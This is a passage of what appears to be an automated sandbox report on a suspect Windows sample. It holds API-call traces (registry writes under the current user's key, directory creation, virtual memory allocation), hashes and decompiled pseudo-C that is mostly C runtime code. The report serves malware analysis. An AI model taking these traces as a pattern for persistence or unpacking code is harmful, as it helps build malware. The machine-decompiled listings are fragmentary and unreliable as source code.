                                                                                      • Part of subcall function 0059020A: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 005902FF
                                                                                    • RegGetValueW.KERNELBASE(80000001,?,?,0000FFFF,00000000,00000000,00000000), ref: 00590875
                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,?,00000000,00020006,?), ref: 00590891
                                                                                    • RegSetValueExW.KERNELBASE(?,?,00000000,00000001,?,00000103), ref: 005908CF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$CreateExistsPathValue$DirectoryOpen
                                                                                    • String ID:
                                                                                    • API String ID: 3065547873-0
                                                                                    • Opcode ID: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                                                                                    • Instruction ID: 5f0b16808a0f6491d66b7fd5deb11b01249ed5dbd599d4ab73e3b7da54140ad1
                                                                                    • Opcode Fuzzy Hash: 0d883c9af3d01ddd46bdeb3ed83b6a0b58d92d35368ae9faeefab95d18a55217
                                                                                    • Instruction Fuzzy Hash: F6D16D21E14358A9EF20DBF0DC45BEEB778FF54750F10649BE608EB190E7B14A848B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 430 59037c-59040b call 59005f call 590073 * 3 PathFileExistsW 440 59041a-59041f 430->440 441 59040d-590418 CreateDirectoryW 430->441 441->440
                                                                                    APIs
                                                                                    • PathFileExistsW.KERNELBASE(?), ref: 00590406
                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00590412
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryExistsFilePath
                                                                                    • String ID:
                                                                                    • API String ID: 2624722123-0
                                                                                    • Opcode ID: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                                                                                    • Instruction ID: 7ef09aee305ae60745c4d9a475364c38e4472648084569c8655cb240a7e80fc6
                                                                                    • Opcode Fuzzy Hash: 2d927dbdc0c98ac60f85d63aaf64e35996fbb75628e29af14dbdce1127c1c687
                                                                                    • Instruction Fuzzy Hash: 9011E325A54308B8EF10ABF0EC1AFBE6735EF80B10F10691BF904EB1E0E6754B408399
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 442 402d27-402d3b call 405990 445 402d6c 442->445 446 402d3d-402d40 442->446 447 402d6e-402d73 call 4059d5 445->447 446->445 448 402d42-402d45 446->448 450 402d74-402d8f call 4058af call 402b6b 448->450 451 402d47-402d4b 448->451 463 402d94-402da9 call 402dab 450->463 454 402d5c-402d67 call 40370a call 4036b8 451->454 455 402d4d-402d59 call 4031b0 451->455 454->445 455->454 463->447
                                                                                    C-Code - Quality: 88%
                                                                                    			E00402D27(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				intOrPtr _t19;
                                                                                    				intOrPtr _t22;
                                                                                    				void* _t33;
                                                                                    
                                                                                    				_push(0xc);
                                                                                    				_push(0x411fd0);
                                                                                    				E00405990(__ebx, __edi, __esi);
                                                                                    				 *((intOrPtr*)(_t33 - 0x1c)) = 0;
                                                                                    				if( *((intOrPtr*)(_t33 + 0x10)) == 0 ||  *((intOrPtr*)(_t33 + 0x14)) == 0) {
                                                                                    					L6:
                                                                                    					_t19 = 0;
                                                                                    				} else {
                                                                                    					if( *((intOrPtr*)(_t33 + 0x18)) != 0) {
                                                                                    						E004058AF( *((intOrPtr*)(_t33 + 0x18)));
                                                                                    						 *((intOrPtr*)(_t33 - 4)) = 0;
                                                                                    						_t22 = E00402B6B( *((intOrPtr*)(_t33 + 8)),  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)),  *((intOrPtr*)(_t33 + 0x14)),  *((intOrPtr*)(_t33 + 0x18))); // executed
                                                                                    						 *((intOrPtr*)(_t33 - 0x1c)) = _t22;
                                                                                    						 *((intOrPtr*)(_t33 - 4)) = 0xfffffffe;
                                                                                    						E00402DAB();
                                                                                    						_t19 =  *((intOrPtr*)(_t33 - 0x1c));
                                                                                    					} else {
                                                                                    						_t41 =  *((intOrPtr*)(_t33 + 0xc)) - 0xffffffff;
                                                                                    						if( *((intOrPtr*)(_t33 + 0xc)) != 0xffffffff) {
                                                                                    							E004031B0( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                                                                                    						}
                                                                                    						 *((intOrPtr*)(E0040370A(_t41))) = 0x16;
                                                                                    						E004036B8();
                                                                                    						goto L6;
                                                                                    					}
                                                                                    				}
                                                                                    				return E004059D5(_t19);
                                                                                    			}






                                                                                    0x00402d27
                                                                                    0x00402d29
                                                                                    0x00402d2e
                                                                                    0x00402d35
                                                                                    0x00402d3b
                                                                                    0x00402d6c
                                                                                    0x00402d6c
                                                                                    0x00402d42
                                                                                    0x00402d45
                                                                                    0x00402d77
                                                                                    0x00402d7d
                                                                                    0x00402d8f
                                                                                    0x00402d97
                                                                                    0x00402d9a
                                                                                    0x00402da1
                                                                                    0x00402da6
                                                                                    0x00402d47
                                                                                    0x00402d47
                                                                                    0x00402d4b
                                                                                    0x00402d54
                                                                                    0x00402d59
                                                                                    0x00402d61
                                                                                    0x00402d67
                                                                                    0x00000000
                                                                                    0x00402d67
                                                                                    0x00402d45
                                                                                    0x00402d73

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: __lock_file_memset
                                                                                    • String ID:
                                                                                    • API String ID: 26237723-0
                                                                                    • Opcode ID: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
                                                                                    • Instruction ID: 9e23bb097c87b2cb0c8b28cae3504dfd9644aeb73d234b4e03d6ed55913451c2
                                                                                    • Opcode Fuzzy Hash: 33fae8696a22ddc01b4e9403b0cd89f9325ebf0e069a85eabe1f3f523a260358
                                                                                    • Instruction Fuzzy Hash: 92014071800219EBCF22AFA5C90989F7F30AF04765F10813BF914761E1C3798A62DF95
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    C-Code - Quality: 86%
                                                                                    			E00402F66(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                    				signed int _t15;
                                                                                    				signed int _t17;
                                                                                    				void* _t26;
                                                                                    				intOrPtr _t28;
                                                                                    
                                                                                    				_push(0xc);
                                                                                    				_push(0x411ff0);
                                                                                    				E00405990(__ebx, __edi, __esi);
                                                                                    				_t28 =  *((intOrPtr*)(_t26 + 8));
                                                                                    				_t29 = _t28 != 0;
                                                                                    				if(_t28 != 0) {
                                                                                    					E004058AF( *((intOrPtr*)(_t26 + 8)));
                                                                                    					_t5 = _t26 - 4;
                                                                                    					 *_t5 =  *(_t26 - 4) & 0x00000000;
                                                                                    					__eflags =  *_t5;
                                                                                    					_t15 = E00402DD2( *((intOrPtr*)(_t26 + 8))); // executed
                                                                                    					 *(_t26 - 0x1c) = _t15;
                                                                                    					 *(_t26 - 4) = 0xfffffffe;
                                                                                    					E00402FC1();
                                                                                    					_t17 =  *(_t26 - 0x1c);
                                                                                    				} else {
                                                                                    					 *((intOrPtr*)(E0040370A(_t29))) = 0x16;
                                                                                    					_t17 = E004036B8() | 0xffffffff;
                                                                                    				}
                                                                                    				return E004059D5(_t17);
                                                                                    			}







                                                                                    0x00402f66
                                                                                    0x00402f68
                                                                                    0x00402f6d
                                                                                    0x00402f74
                                                                                    0x00402f7a
                                                                                    0x00402f7c
                                                                                    0x00402f96
                                                                                    0x00402f9c
                                                                                    0x00402f9c
                                                                                    0x00402f9c
                                                                                    0x00402fa3
                                                                                    0x00402fa9
                                                                                    0x00402fac
                                                                                    0x00402fb3
                                                                                    0x00402fb8
                                                                                    0x00402f7e
                                                                                    0x00402f83
                                                                                    0x00402f8e
                                                                                    0x00402f8e
                                                                                    0x00402fc0

                                                                                    APIs
                                                                                    • __lock_file.LIBCMT ref: 00402F96
                                                                                    • __ftell_nolock.LIBCMT ref: 00402FA3
                                                                                      • Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2999321469-0
                                                                                    • Opcode ID: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
                                                                                    • Instruction ID: 8b2200138f54d187428e708a17617e132bb05bf2f3e2a31370f94ea22eeb7263
                                                                                    • Opcode Fuzzy Hash: 8f3263e8028bc76e635bdae56e131ecbfbf27d60d2d8a770a885cf73d947d5b9
                                                                                    • Instruction Fuzzy Hash: 51F03771410606EADB117F75C90675E7B70AF00379F20857BF414BA1D1CBBC45919A19
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 484 40c55d-40c567 485 40c584-40c58d 484->485 486 40c569-40c573 484->486 487 40c590-40c595 485->487 488 40c58f 485->488 486->485 489 40c575-40c583 call 40370a 486->489 490 40c597-40c5a8 RtlAllocateHeap 487->490 491 40c5aa-40c5b1 487->491 488->487 490->491 493 40c5dc-40c5de 490->493 494 40c5b3-40c5bc call 40b343 491->494 495 40c5cf-40c5d4 491->495 494->487 500 40c5be-40c5c3 494->500 495->493 498 40c5d6 495->498 498->493 501 40c5c5 500->501 502 40c5cb-40c5cd 500->502 501->502 502->493
                                                                                    C-Code - Quality: 86%
                                                                                    			E0040C55D(signed int _a4, signed int _a8, long _a12) {
                                                                                    				void* _t10;
                                                                                    				long _t11;
                                                                                    				long _t12;
                                                                                    				signed int _t13;
                                                                                    				signed int _t17;
                                                                                    				long _t19;
                                                                                    				long _t24;
                                                                                    
                                                                                    				_t17 = _a4;
                                                                                    				if(_t17 == 0) {
                                                                                    					L3:
                                                                                    					_t24 = _t17 * _a8;
                                                                                    					__eflags = _t24;
                                                                                    					if(_t24 == 0) {
                                                                                    						_t24 = _t24 + 1;
                                                                                    						__eflags = _t24;
                                                                                    					}
                                                                                    					goto L5;
                                                                                    					L6:
                                                                                    					_t10 = RtlAllocateHeap( *0x415a64, 8, _t24); // executed
                                                                                    					__eflags = 0;
                                                                                    					if(0 == 0) {
                                                                                    						goto L7;
                                                                                    					}
                                                                                    					L14:
                                                                                    					return _t10;
                                                                                    					goto L15;
                                                                                    					L7:
                                                                                    					__eflags =  *0x415f58;
                                                                                    					if( *0x415f58 == 0) {
                                                                                    						_t19 = _a12;
                                                                                    						__eflags = _t19;
                                                                                    						if(_t19 != 0) {
                                                                                    							 *_t19 = 0xc;
                                                                                    						}
                                                                                    					} else {
                                                                                    						_t11 = E0040B343(_t10, _t24);
                                                                                    						__eflags = _t11;
                                                                                    						if(_t11 != 0) {
                                                                                    							L5:
                                                                                    							_t10 = 0;
                                                                                    							__eflags = _t24 - 0xffffffe0;
                                                                                    							if(_t24 > 0xffffffe0) {
                                                                                    								goto L7;
                                                                                    							} else {
                                                                                    								goto L6;
                                                                                    							}
                                                                                    						} else {
                                                                                    							_t12 = _a12;
                                                                                    							__eflags = _t12;
                                                                                    							if(_t12 != 0) {
                                                                                    								 *_t12 = 0xc;
                                                                                    							}
                                                                                    							_t10 = 0;
                                                                                    						}
                                                                                    					}
                                                                                    					goto L14;
                                                                                    				} else {
                                                                                    					_t13 = 0xffffffe0;
                                                                                    					_t27 = _t13 / _t17 - _a8;
                                                                                    					if(_t13 / _t17 >= _a8) {
                                                                                    						goto L3;
                                                                                    					} else {
                                                                                    						 *((intOrPtr*)(E0040370A(_t27))) = 0xc;
                                                                                    						return 0;
                                                                                    					}
                                                                                    				}
                                                                                    				L15:
                                                                                    			}










                                                                                    0x0040c562
                                                                                    0x0040c567
                                                                                    0x0040c584
                                                                                    0x0040c589
                                                                                    0x0040c58b
                                                                                    0x0040c58d
                                                                                    0x0040c58f
                                                                                    0x0040c58f
                                                                                    0x0040c58f
                                                                                    0x00000000
                                                                                    0x0040c597
                                                                                    0x0040c5a0
                                                                                    0x0040c5a6
                                                                                    0x0040c5a8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040c5dc
                                                                                    0x0040c5de
                                                                                    0x00000000
                                                                                    0x0040c5aa
                                                                                    0x0040c5aa
                                                                                    0x0040c5b1
                                                                                    0x0040c5cf
                                                                                    0x0040c5d2
                                                                                    0x0040c5d4
                                                                                    0x0040c5d6
                                                                                    0x0040c5d6
                                                                                    0x0040c5b3
                                                                                    0x0040c5b4
                                                                                    0x0040c5ba
                                                                                    0x0040c5bc
                                                                                    0x0040c590
                                                                                    0x0040c590
                                                                                    0x0040c592
                                                                                    0x0040c595
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040c5be
                                                                                    0x0040c5be
                                                                                    0x0040c5c1
                                                                                    0x0040c5c3
                                                                                    0x0040c5c5
                                                                                    0x0040c5c5
                                                                                    0x0040c5cb
                                                                                    0x0040c5cb
                                                                                    0x0040c5bc
                                                                                    0x00000000
                                                                                    0x0040c569
                                                                                    0x0040c56d
                                                                                    0x0040c570
                                                                                    0x0040c573
                                                                                    0x00000000
                                                                                    0x0040c575
                                                                                    0x0040c57a
                                                                                    0x0040c583
                                                                                    0x0040c583
                                                                                    0x0040c573
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • RtlAllocateHeap.NTDLL(00000008,004029D6,00000000,?,00408C55,00000000,004029D6,00000000,00000000,00000000,?,0040725B,00000001,00000214,?,004033DA), ref: 0040C5A0
                                                                                      • Part of subcall function 0040370A: __getptd_noexit.LIBCMT ref: 0040370A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                    • String ID:
                                                                                    • API String ID: 328603210-0
                                                                                    • Opcode ID: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
                                                                                    • Instruction ID: 3453bd4832c175796419321ec01136e88b743f7a930f2e637f01305e36202e16
                                                                                    • Opcode Fuzzy Hash: c35acac04d4de571c3b900101eba404759f094f7bb0d36237bb97e882affdf1c
                                                                                    • Instruction Fuzzy Hash: 88019239201225EEEB249F65DC94BA73795AB85360F108B3AE815AB2D0DB38E901C658
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 00590EBF: GetSystemInfo.KERNELBASE(?), ref: 00590EDC
                                                                                    • VirtualAllocExNuma.KERNELBASE(00000000), ref: 00590F82
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocInfoNumaSystemVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 449148690-0
                                                                                    • Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                                                                                    • Instruction ID: c2e8ba175f736b17331e8dfdf6ecec3f2a9601a6e442b83f313c00b3219d1d88
                                                                                    • Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                                                                                    • Instruction Fuzzy Hash: 3DF0FF70D4430ABEEF207BF18D0EB6D7E68BF80301F506D95BA04AB1C3DA7857045A66
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 536 40318f-4031a5 call 4030d1
                                                                                    C-Code - Quality: 25%
                                                                                    			E0040318F(intOrPtr _a4, intOrPtr _a8) {
                                                                                    				void* __ebp;
                                                                                    				void* _t3;
                                                                                    				void* _t4;
                                                                                    				void* _t5;
                                                                                    				void* _t6;
                                                                                    				void* _t9;
                                                                                    
                                                                                    				_push(0x40);
                                                                                    				_push(_a8);
                                                                                    				_push(_a4);
                                                                                    				_t3 = E004030D1(_t4, _t5, _t6, _t9); // executed
                                                                                    				return _t3;
                                                                                    			}









                                                                                    0x00403194
                                                                                    0x00403196
                                                                                    0x00403199
                                                                                    0x0040319c
                                                                                    0x004031a5

                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wfsopen
                                                                                    • String ID:
                                                                                    • API String ID: 197181222-0
                                                                                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                    • Instruction ID: 2ced2bfb3f9d4ac77b3096636764d60d89a48be8f4a51fc1c3532829defdef63
                                                                                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                    • Instruction Fuzzy Hash: 26C0927254020C77DF112E83EC02E4A3F5E9BC0774F448021FB1C291A5AA77EAA19689
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • RtlEncodePointer.NTDLL(00000000,0040B4CB,00415220,00000314,00000000,?,?,?,?,?,00406B3A,00415220,Microsoft Visual C++ Runtime Library,00012010), ref: 004070FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: EncodePointer
                                                                                    • String ID:
                                                                                    • API String ID: 2118026453-0
                                                                                    • Opcode ID: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
                                                                                    • Instruction ID: 45c9fe6625449defc2d77b84375a10b8a7ee1ea61be3005a2c3dbae11cbcc7d8
                                                                                    • Opcode Fuzzy Hash: 4880c20d65b4e0c8c680dfcee244b8a26e30051ea0af9c1fdfdc0c01e56bd82f
                                                                                    • Instruction Fuzzy Hash:
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 00590E5C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333619189.0000000000590000.00000040.00001000.00020000.00000000.sdmp, Offset: 00590000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_590000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                                                                                    • Instruction ID: a80a231ed5ed21996f1312694ab3c88f34341398b34b6276ea56bc478a158154
                                                                                    • Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                                                                                    • Instruction Fuzzy Hash: 93110370D00219EFEF00EBA8DC49BAEBBB8BB04304F609895E955B7291D2754A449B90
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 85%
                                                                                    			E0040800D(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                    				intOrPtr _v0;
                                                                                    				void* _v804;
                                                                                    				intOrPtr _v808;
                                                                                    				intOrPtr _v812;
                                                                                    				intOrPtr _t6;
                                                                                    				intOrPtr _t11;
                                                                                    				intOrPtr _t12;
                                                                                    				intOrPtr _t13;
                                                                                    				long _t17;
                                                                                    				intOrPtr _t21;
                                                                                    				intOrPtr _t22;
                                                                                    				intOrPtr _t25;
                                                                                    				intOrPtr _t26;
                                                                                    				intOrPtr _t27;
                                                                                    				intOrPtr* _t31;
                                                                                    				void* _t34;
                                                                                    
                                                                                    				_t27 = __esi;
                                                                                    				_t26 = __edi;
                                                                                    				_t25 = __edx;
                                                                                    				_t22 = __ecx;
                                                                                    				_t21 = __ebx;
                                                                                    				_t6 = __eax;
                                                                                    				_t34 = _t22 -  *0x414570; // 0xd6edc63b
                                                                                    				if(_t34 == 0) {
                                                                                    					asm("repe ret");
                                                                                    				}
                                                                                    				 *0x415d28 = _t6;
                                                                                    				 *0x415d24 = _t22;
                                                                                    				 *0x415d20 = _t25;
                                                                                    				 *0x415d1c = _t21;
                                                                                    				 *0x415d18 = _t27;
                                                                                    				 *0x415d14 = _t26;
                                                                                    				 *0x415d40 = ss;
                                                                                    				 *0x415d34 = cs;
                                                                                    				 *0x415d10 = ds;
                                                                                    				 *0x415d0c = es;
                                                                                    				 *0x415d08 = fs;
                                                                                    				 *0x415d04 = gs;
                                                                                    				asm("pushfd");
                                                                                    				_pop( *0x415d38);
                                                                                    				 *0x415d2c =  *_t31;
                                                                                    				 *0x415d30 = _v0;
                                                                                    				 *0x415d3c =  &_a4;
                                                                                    				 *0x415c78 = 0x10001;
                                                                                    				_t11 =  *0x415d30; // 0x0
                                                                                    				 *0x415c2c = _t11;
                                                                                    				 *0x415c20 = 0xc0000409;
                                                                                    				 *0x415c24 = 1;
                                                                                    				_t12 =  *0x414570; // 0xd6edc63b
                                                                                    				_v812 = _t12;
                                                                                    				_t13 =  *0x414574; // 0x291239c4
                                                                                    				_v808 = _t13;
                                                                                    				 *0x415c70 = IsDebuggerPresent();
                                                                                    				_push(1);
                                                                                    				E00408005(_t14);
                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                    				_t17 = UnhandledExceptionFilter(" \\A");
                                                                                    				if( *0x415c70 == 0) {
                                                                                    					_push(1);
                                                                                    					E00408005(_t17);
                                                                                    				}
                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                    			}



















                                                                                    0x0040800d
                                                                                    0x0040800d
                                                                                    0x0040800d
                                                                                    0x0040800d
                                                                                    0x0040800d
                                                                                    0x0040800d
                                                                                    0x0040800d
                                                                                    0x00408013
                                                                                    0x00408015
                                                                                    0x00408015
                                                                                    0x0040b896
                                                                                    0x0040b89b
                                                                                    0x0040b8a1
                                                                                    0x0040b8a7
                                                                                    0x0040b8ad
                                                                                    0x0040b8b3
                                                                                    0x0040b8b9
                                                                                    0x0040b8c0
                                                                                    0x0040b8c7
                                                                                    0x0040b8ce
                                                                                    0x0040b8d5
                                                                                    0x0040b8dc
                                                                                    0x0040b8e3
                                                                                    0x0040b8e4
                                                                                    0x0040b8ed
                                                                                    0x0040b8f5
                                                                                    0x0040b8fd
                                                                                    0x0040b908
                                                                                    0x0040b912
                                                                                    0x0040b917
                                                                                    0x0040b91c
                                                                                    0x0040b926
                                                                                    0x0040b930
                                                                                    0x0040b935
                                                                                    0x0040b93b
                                                                                    0x0040b940
                                                                                    0x0040b94c
                                                                                    0x0040b951
                                                                                    0x0040b953
                                                                                    0x0040b95b
                                                                                    0x0040b966
                                                                                    0x0040b973
                                                                                    0x0040b975
                                                                                    0x0040b977
                                                                                    0x0040b97c
                                                                                    0x0040b990

                                                                                    APIs
                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0040B946
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040B95B
                                                                                    • UnhandledExceptionFilter.KERNEL32( \A), ref: 0040B966
                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0040B982
                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0040B989
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                    • String ID: \A
                                                                                    • API String ID: 2579439406-3503946924
                                                                                    • Opcode ID: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
                                                                                    • Instruction ID: 85da8a808e4b98403950fcee6e72ddd3236f317be0e167dc40347674819b260b
                                                                                    • Opcode Fuzzy Hash: 6a3e57fa7c72d397f773aac9d32601290c33fa956e244bc9e11b990348b6f039
                                                                                    • Instruction Fuzzy Hash: 5B219EB8811B04EBD740DF65FD896C43BB4BB88315F50C53AE9099A260EBB959818F8D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004066DE() {
                                                                                    
                                                                                    				SetUnhandledExceptionFilter(E0040669C);
                                                                                    				return 0;
                                                                                    			}



                                                                                    0x004066e3
                                                                                    0x004066eb

                                                                                    APIs
                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0000669C), ref: 004066E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.333584025.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.333579737.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333595573.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000002.00000002.333603100.0000000000414000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_czkdqe.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                    • String ID:
                                                                                    • API String ID: 3192549508-0
                                                                                    • Opcode ID: bded30a880d91434e9ea7b6cf477416163f9988ffaad514a95d85cac01b9da64
                                                                                    • Instruction ID: 84f951258dbbba53fa59dbd9b439672c707fbbd9d41bbe323b106ac1153b7929
